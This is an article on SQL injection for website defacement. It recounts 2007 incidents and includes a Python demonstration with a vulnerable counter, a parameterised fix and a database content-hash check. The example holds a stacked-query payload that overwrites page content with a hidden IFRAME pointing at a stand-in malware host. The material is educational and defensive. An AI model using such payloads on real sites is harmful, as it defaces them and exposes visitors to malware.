
SQL Injection for Web site defacement

Web site defacement traditionally occurred when an attacker obtained administrative access to a Web site and then altered its content, replacing pages with offensive or erroneous graphics and text. As Web site owners have bolstered the security of their Web configuration and administration tools, attackers have turned to another technique for defacing Web sites: SQL injection.

In 2007, there were several high-profile incidents in which SQL injection was used for Web site defacement. The Microsoft UK(3) site and the United Nations(4) (UN) site were defaced within months of each other that year. This type of attack is possible when the injection point allows not only tampering with the criteria of a SELECT statement but also appending additional SQL statements (stacked queries) such as INSERT or UPDATE. In particular, an attacker can construct an UPDATE statement that overwrites the contents of database columns that are later embedded in HTML pages. The attacker replaces the original content of such columns with HTML code that either changes the appearance of the page (by embedding offensive images) or silently pulls content from a malware-hosting server into it (by embedding IFRAME tags).

Because this type of Web site defacement alters rows in the backend database rather than the Web application's static files, neither a file-based change-tracking system nor a change-management process would detect the attack; the files on disk are exactly as they were deployed.
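The following is an added example, not code from the original article or from either of the sites mentioned above. It models the attack in Python against an in-memory SQLite database: a hypothetical CMS table `pages` whose `body` column is embedded verbatim in HTML, a page-view counter that concatenates the page id into its SQL and runs it through a call that accepts several semicolon-separated statements (the injection point), a constructed payload that stacks an UPDATE to plant a hidden IFRAME, the hardened version of the same function, and a content-hash baseline over the database columns that a file-based change tracker never sees. The table, column names, payload and hostname `malware.example` are all assumptions made for the illustration.

```python
import hashlib
import sqlite3

# Constructed sample data (not from the original article): a tiny CMS table
# whose `body` column is embedded verbatim in the rendered HTML page.
SEED_ROWS = [
    (1, "Home", "<p>Welcome to our site.</p>", 0),
    (2, "About", "<p>We build web applications.</p>", 0),
]

# Hypothetical attacker input. The leading "1" satisfies the intended WHERE
# clause; the ';' terminates that statement so a second, stacked UPDATE can
# follow. The UPDATE carries no WHERE clause, so every page body is replaced
# with a hidden IFRAME pointing at an attacker-chosen host (an assumed name).
DEFACEMENT_PAYLOAD = (
    "1; UPDATE pages SET body = "
    "'<iframe src=\"http://malware.example/\" width=\"0\" height=\"0\"></iframe>'"
)


def make_db():
    """In-memory SQLite database seeded with the sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def record_view_vulnerable(conn, page_id):
    """Injection point: the page id is concatenated into the SQL text, and the
    text is handed to executescript(), which, like many database APIs and
    drivers, accepts several ';'-separated statements in one call."""
    sql = f"UPDATE pages SET views = views + 1 WHERE id = {page_id}"
    conn.executescript(sql)


def record_view_fixed(conn, page_id):
    """Hardened version: validate the type and bind the value as a parameter,
    so the input is never parsed as SQL, let alone as a second statement."""
    pid = int(page_id)  # raises ValueError for anything that is not an integer
    conn.execute("UPDATE pages SET views = views + 1 WHERE id = ?", (pid,))
    conn.commit()


def render_page(conn, page_id):
    """What the web tier does with the stored content: embed it straight into HTML."""
    title, body = conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (page_id,)
    ).fetchone()
    return f"<html><head><title>{title}</title></head><body>{body}</body></html>"


def content_snapshot(conn):
    """Integrity baseline for content a file-based change tracker never sees:
    a digest of every column whose value ends up inside a served page."""
    return {
        row_id: hashlib.sha256(body.encode("utf-8")).hexdigest()
        for row_id, body in conn.execute("SELECT id, body FROM pages ORDER BY id")
    }


def changed_rows(baseline, current):
    """Ids whose stored content no longer matches the recorded baseline."""
    return sorted(k for k in baseline if baseline[k] != current.get(k))


def demo():
    """Run the payload against the vulnerable code, then against the fix."""
    conn = make_db()
    baseline = content_snapshot(conn)

    record_view_vulnerable(conn, DEFACEMENT_PAYLOAD)
    defaced = changed_rows(baseline, content_snapshot(conn))   # every row touched
    iframe_served = "<iframe" in render_page(conn, 2)           # defacement is live

    conn = make_db()
    try:
        record_view_fixed(conn, DEFACEMENT_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    intact = changed_rows(baseline, content_snapshot(conn)) == []

    return {"defaced": defaced, "iframe_served": iframe_served,
            "rejected": rejected, "intact": intact}


if __name__ == "__main__":
    print(demo())
```

The snapshot-and-diff step is the database-side counterpart to file-integrity monitoring: record digests of the columns that feed HTML at deployment time and compare them on a schedule, and a stacked UPDATE like the one above shows up as a changed row even though nothing on disk moved. A cheap complement is a scan of those same columns for markers such as `<iframe` or `<script` that legitimate content never contains.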


About KLATENWEB

Development services for PHP- and MySQL-based web applications: web portals, personal sites, online shops, academic information systems, personnel (SIMPeg) and hospital information systems, Facebook applications and more, as well as low-cost domain registration and unlimited hosting.